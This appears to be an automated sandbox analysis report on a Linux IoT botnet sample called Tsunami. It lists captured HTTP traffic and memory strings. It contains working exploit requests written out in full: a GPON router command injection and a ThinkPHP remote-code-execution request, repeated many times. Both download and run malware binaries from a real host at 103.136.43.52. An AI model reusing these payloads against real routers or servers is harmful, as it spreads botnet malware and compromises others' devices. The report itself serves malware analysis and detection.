4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/cgi-bin/ViewLog.asp' was not found on this server.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:17:33 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not foundConnection: closeData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:03:03 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:14:15 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 207Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 61 70 70 2f 77 65 62 73 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/app/webs/cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:17:45 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveKeep-Alive: timeout=20Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Sat, 14 May 2022 00:17:45 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 35 20 28 44 65 62 69 61 6e 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73

Source: NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://103.136.43.52/bin
Source: NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://103.136.43.52/bins/Tsunami.mips;
Source: NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://103.136.43.52/bins/Tsunami.x86
Source: NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://103.136.43.52/zyxel.sh;
Source: NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
Source: NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: NE8O7liu0s, 6225.1.00000000c39c139a.00000000c17c93de.r-x.sdmp, NE8O7liu0s, 6229.1.00000000c39c139a.00000000c17c93de.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: NE8O7liu0s	String found in binary or memory: http://upx.sf.net

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://103.136.43.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
